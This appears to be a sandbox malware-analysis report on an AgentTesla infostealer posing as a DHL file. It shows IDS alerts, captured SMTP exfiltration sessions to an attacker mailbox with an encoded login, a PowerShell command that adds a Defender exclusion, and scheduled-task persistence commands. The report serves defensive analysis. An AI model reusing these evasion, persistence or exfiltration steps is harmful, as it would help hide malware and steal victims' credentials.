                                              04/24/24-07:15:17.806983 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49736 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:15.003229 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49733 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:34.872156 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49743 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:34.872156 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49743 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:28.935275 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49738 | 587 | 192.168.2.4 | 50.87.253.239
                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 24, 2024 07:15:34.870702982 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:34.872020006 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:34.872155905 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:34.872194052 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:34.872208118 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:35.053040981 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:35.054368973 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:35.098263025 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:35.289902925 CEST49738587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:16:53.131306887 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:16:53.352382898 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:16:53.512456894 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:16:53.512608051 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:16:53.516752005 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:16:53.696897030 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:16:56.215698004 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:16:56.434331894 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:16:56.595748901 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:16:56.595841885 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:16:56.599314928 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:16:56.777652025 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:17:13.308809042 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:17:13.530256987 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:17:13.691904068 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:17:13.692084074 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:17:13.692240953 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:17:13.873070002 CEST5874974350.87.253.239192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 24, 2024 07:15:12.932060957 CEST | 59046 | 53 | 192.168.2.4 | 1.1.1.1
Apr 24, 2024 07:15:13.186793089 CEST | 53 | 59046 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 24, 2024 07:15:12.932060957 CEST | 192.168.2.4 | 1.1.1.1 | 0xa30f | Standard query (0) | mail.clslk.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 24, 2024 07:15:13.186793089 CEST | 1.1.1.1 | 192.168.2.4 | 0xa30f | No error (0) | mail.clslk.com | | 50.87.253.239 | A (IP address) | IN (0x0001) | false

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Apr 24, 2024 07:15:13.734996080 CEST | 587 | 49733 | 50.87.253.239 | 192.168.2.4 | 220-box2224.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 23:15:13 -0600
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Apr 24, 2024 07:15:13.736385107 CEST | 49733 | 587 | 192.168.2.4 | 50.87.253.239 | EHLO 688098
Apr 24, 2024 07:15:13.916255951 CEST | 587 | 49733 | 50.87.253.239 | 192.168.2.4 | 250-box2224.bluehost.com Hello 688098 [154.16.105.36]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Apr 24, 2024 07:15:13.917087078 CEST | 49733 | 587 | 192.168.2.4 | 50.87.253.239 | AUTH login Z21AY2xzbGsuY29t
Apr 24, 2024 07:15:14.096846104 CEST | 587 | 49733 | 50.87.253.239 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Apr 24, 2024 07:15:14.378309011 CEST | 587 | 49733 | 50.87.253.239 | 192.168.2.4 | 235 Authentication succeeded
Apr 24, 2024 07:15:14.385091066 CEST | 49733 | 587 | 192.168.2.4 | 50.87.253.239 | MAIL FROM:<gm@clslk.com>
Apr 24, 2024 07:15:14.564886093 CEST | 587 | 49733 | 50.87.253.239 | 192.168.2.4 | 250 OK
Apr 24, 2024 07:15:14.565119028 CEST | 49733 | 587 | 192.168.2.4 | 50.87.253.239 | RCPT TO:<devendra@syncro-group.xyz>
Apr 24, 2024 07:15:14.814960003 CEST | 587 | 49733 | 50.87.253.239 | 192.168.2.4 | 250 Accepted
Apr 24, 2024 07:15:14.822933912 CEST | 49733 | 587 | 192.168.2.4 | 50.87.253.239 | DATA
Apr 24, 2024 07:15:15.002629042 CEST | 587 | 49733 | 50.87.253.239 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
Apr 24, 2024 07:15:15.003284931 CEST | 49733 | 587 | 192.168.2.4 | 50.87.253.239 | .
Apr 24, 2024 07:15:15.187161922 CEST | 587 | 49733 | 50.87.253.239 | 192.168.2.4 | 250 OK id=1rzUyQ-002xiT-2x
Apr 24, 2024 07:15:16.637136936 CEST | 587 | 49736 | 50.87.253.239 | 192.168.2.4 | 220-box2224.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 23:15:16 -0600
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Apr 24, 2024 07:15:16.637379885 CEST | 49736 | 587 | 192.168.2.4 | 50.87.253.239 | EHLO 688098
Apr 24, 2024 07:15:16.816615105 CEST | 587 | 49736 | 50.87.253.239 | 192.168.2.4 | 250-box2224.bluehost.com Hello 688098 [154.16.105.36]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Apr 24, 2024 07:15:16.816907883 CEST | 49736 | 587 | 192.168.2.4 | 50.87.253.239 | AUTH login Z21AY2xzbGsuY29t
Apr 24, 2024 07:15:16.996493101 CEST | 587 | 49736 | 50.87.253.239 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Apr 24, 2024 07:15:17.177126884 CEST | 587 | 49736 | 50.87.253.239 | 192.168.2.4 | 235 Authentication succeeded
Apr 24, 2024 07:15:17.177360058 CEST | 49736 | 587 | 192.168.2.4 | 50.87.253.239 | MAIL FROM:<gm@clslk.com>
Apr 24, 2024 07:15:17.356554985 CEST | 587 | 49736 | 50.87.253.239 | 192.168.2.4 | 250 OK
Apr 24, 2024 07:15:17.364828110 CEST | 49736 | 587 | 192.168.2.4 | 50.87.253.239 | RCPT TO:<devendra@syncro-group.xyz>
Apr 24, 2024 07:15:17.624378920 CEST | 587 | 49736 | 50.87.253.239 | 192.168.2.4 | 250 Accepted
Apr 24, 2024 07:15:17.624610901 CEST | 49736 | 587 | 192.168.2.4 | 50.87.253.239 | DATA
Apr 24, 2024 07:15:17.803246021 CEST | 587 | 49736 | 50.87.253.239 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
Apr 24, 2024 07:15:17.806982994 CEST | 49736 | 587 | 192.168.2.4 | 50.87.253.239 | .
Apr 24, 2024 07:15:17.987016916 CEST | 587 | 49736 | 50.87.253.239 | 192.168.2.4 | 250 OK id=1rzUyT-002xmM-2J
Apr 24, 2024 07:15:27.764365911 CEST | 587 | 49738 | 50.87.253.239 | 192.168.2.4 | 220-box2224.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 23:15:27 -0600
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Apr 24, 2024 07:15:27.765461922 CEST | 49738 | 587 | 192.168.2.4 | 50.87.253.239 | EHLO 688098
Apr 24, 2024 07:15:27.947149992 CEST | 587 | 49738 | 50.87.253.239 | 192.168.2.4 | 250-box2224.bluehost.com Hello 688098 [154.16.105.36]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Apr 24, 2024 07:15:27.947813034 CEST | 49738 | 587 | 192.168.2.4 | 50.87.253.239 | AUTH login Z21AY2xzbGsuY29t
Apr 24, 2024 07:15:28.129539967 CEST | 587 | 49738 | 50.87.253.239 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Apr 24, 2024 07:15:28.313100100 CEST | 587 | 49738 | 50.87.253.239 | 192.168.2.4 | 235 Authentication succeeded
Apr 24, 2024 07:15:28.313327074 CEST | 49738 | 587 | 192.168.2.4 | 50.87.253.239 | MAIL FROM:<gm@clslk.com>
Apr 24, 2024 07:15:28.496345043 CEST | 587 | 49738 | 50.87.253.239 | 192.168.2.4 | 250 OK
Apr 24, 2024 07:15:28.497138977 CEST | 49738 | 587 | 192.168.2.4 | 50.87.253.239 | RCPT TO:<devendra@syncro-group.xyz>
Apr 24, 2024 07:15:28.752859116 CEST | 587 | 49738 | 50.87.253.239 | 192.168.2.4 | 250 Accepted
Apr 24, 2024 07:15:28.753038883 CEST | 49738 | 587 | 192.168.2.4 | 50.87.253.239 | DATA
Apr 24, 2024 07:15:28.934531927 CEST | 587 | 49738 | 50.87.253.239 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
Apr 24, 2024 07:15:28.935275078 CEST | 49738 | 587 | 192.168.2.4 | 50.87.253.239 | .
Apr 24, 2024 07:15:29.122786999 CEST | 587 | 49738 | 50.87.253.239 | 192.168.2.4 | 250 OK id=1rzUye-002xxm-2j
Apr 24, 2024 07:15:33.704209089 CEST | 587 | 49743 | 50.87.253.239 | 192.168.2.4 | 220-box2224.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 23:15:33 -0600
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Apr 24, 2024 07:15:33.704473972 CEST | 49743 | 587 | 192.168.2.4 | 50.87.253.239 | EHLO 688098
Apr 24, 2024 07:15:33.886003017 CEST | 587 | 49743 | 50.87.253.239 | 192.168.2.4 | 250-box2224.bluehost.com Hello 688098 [154.16.105.36]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Apr 24, 2024 07:15:33.886524916 CEST | 49743 | 587 | 192.168.2.4 | 50.87.253.239 | AUTH login Z21AY2xzbGsuY29t
Apr 24, 2024 07:15:34.067881107 CEST | 587 | 49743 | 50.87.253.239 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Apr 24, 2024 07:15:34.251960993 CEST | 587 | 49743 | 50.87.253.239 | 192.168.2.4 | 235 Authentication succeeded
Apr 24, 2024 07:15:34.252203941 CEST | 49743 | 587 | 192.168.2.4 | 50.87.253.239 | MAIL FROM:<gm@clslk.com>
Apr 24, 2024 07:15:34.433307886 CEST | 587 | 49743 | 50.87.253.239 | 192.168.2.4 | 250 OK
Apr 24, 2024 07:15:34.433759928 CEST | 49743 | 587 | 192.168.2.4 | 50.87.253.239 | RCPT TO:<devendra@syncro-group.xyz>
Apr 24, 2024 07:15:34.689373970 CEST | 587 | 49743 | 50.87.253.239 | 192.168.2.4 | 250 Accepted
Apr 24, 2024 07:15:34.689536095 CEST | 49743 | 587 | 192.168.2.4 | 50.87.253.239 | DATA
Apr 24, 2024 07:15:34.870702982 CEST | 587 | 49743 | 50.87.253.239 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
Apr 24, 2024 07:15:34.872208118 CEST | 49743 | 587 | 192.168.2.4 | 50.87.253.239 | .
Apr 24, 2024 07:15:35.054368973 CEST | 587 | 49743 | 50.87.253.239 | 192.168.2.4 | 250 OK id=1rzUyk-002y1X-2W
Apr 24, 2024 07:16:53.131306887 CEST | 49733 | 587 | 192.168.2.4 | 50.87.253.239 | QUIT
Apr 24, 2024 07:16:53.512456894 CEST | 587 | 49733 | 50.87.253.239 | 192.168.2.4 | 221 box2224.bluehost.com closing connection
Apr 24, 2024 07:16:56.215698004 CEST | 49736 | 587 | 192.168.2.4 | 50.87.253.239 | QUIT
Apr 24, 2024 07:16:56.595748901 CEST | 587 | 49736 | 50.87.253.239 | 192.168.2.4 | 221 box2224.bluehost.com closing connection
Apr 24, 2024 07:17:13.308809042 CEST | 49743 | 587 | 192.168.2.4 | 50.87.253.239 | QUIT
Apr 24, 2024 07:17:13.691904068 CEST | 587 | 49743 | 50.87.253.239 | 192.168.2.4 | 221 box2224.bluehost.com closing connection


                                              Target ID:0
                                              Start time:07:15:08
                                              Start date:24/04/2024
                                              Path:C:\Users\user\Desktop\DHL_1003671162.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\DHL_1003671162.exe"
                                              Imagebase:0x540000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1693256058.0000000003A08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1693256058.0000000003A08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:07:15:10
                                              Start date:24/04/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe"
                                              Imagebase:0x200000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:07:15:10
                                              Start date:24/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:07:15:10
                                              Start date:24/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp"
                                              Imagebase:0x80000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:07:15:10
                                              Start date:24/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:07:15:10
                                              Start date:24/04/2024
                                              Path:C:\Users\user\Desktop\DHL_1003671162.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\DHL_1003671162.exe"
                                              Imagebase:0xb20000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2933834693.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2933834693.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2933834693.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2933834693.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Target ID:7
                                              Start time:07:15:12
                                              Start date:24/04/2024
                                              Path:C:\Users\user\AppData\Roaming\qmUxKv.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\qmUxKv.exe
                                              Imagebase:0x7f0000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1732952396.000000000486F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1732952396.000000000486F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 63%, ReversingLabs
                                              • Detection: 58%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              Target ID:8
                                              Start time:07:15:12
                                              Start date:24/04/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0xa0000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:07:15:14
                                              Start date:24/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp46C8.tmp"
                                              Imagebase:0x80000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:07:15:14
                                              Start date:24/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:07:15:14
                                              Start date:24/04/2024
                                              Path:C:\Users\user\AppData\Roaming\qmUxKv.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\qmUxKv.exe"
                                              Imagebase:0xb40000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2933168050.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2933168050.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2933168050.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2933168050.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Target ID:12
                                              Start time:07:15:22
                                              Start date:24/04/2024
                                              Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                              Imagebase:0xfd0000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 63%, ReversingLabs
                                              • Detection: 58%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              Target ID:13
                                              Start time:07:15:25
                                              Start date:24/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp6C70.tmp"
                                              Imagebase:0x80000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:15
                                              Start time:07:15:25
                                              Start date:24/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:16
                                              Start time:07:15:25
                                              Start date:24/04/2024
                                              Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                              Imagebase:0xf10000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.1903974100.0000000003302000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.1903974100.000000000330A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.1894023046.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.1894023046.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.1903974100.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.1903974100.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:17
                                              Start time:07:15:30
                                              Start date:24/04/2024
                                              Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                              Imagebase:0x250000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:18
                                              Start time:07:15:31
                                              Start date:24/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp8A0A.tmp"
                                              Imagebase:0x80000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:19
                                              Start time:07:15:31
                                              Start date:24/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:20
                                              Start time:07:15:31
                                              Start date:24/04/2024
                                              Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                              Imagebase:0xf50000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.2933907510.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.2933907510.00000000033CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2933907510.000000000337C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.2933907510.000000000337C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Target ID:22
                                              Start time:07:15:32
                                              Start date:24/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true


                                                Execution Graph

                                                Execution Coverage:10.6%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:1.4%
                                                Total number of Nodes:219
                                                Total number of Limit Nodes:19

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$)"
                                                • API String ID: 0-4031938444
                                                • Opcode ID: 55e5651a9712c910066481af3a2ae507388f401bbdc694514e149a679884474a
                                                • Instruction ID: 54af403c62b6fd083fcc1fe381e9fb7121caa970d92b1a4984b5aebdd955e1d9
                                                • Opcode Fuzzy Hash: 55e5651a9712c910066481af3a2ae507388f401bbdc694514e149a679884474a
                                                • Instruction Fuzzy Hash: E4B139B4E102598FCB08CFA9D480ADDFBB2FF89310F24852AD855AB295D734A946CF54
                                                Uniqueness

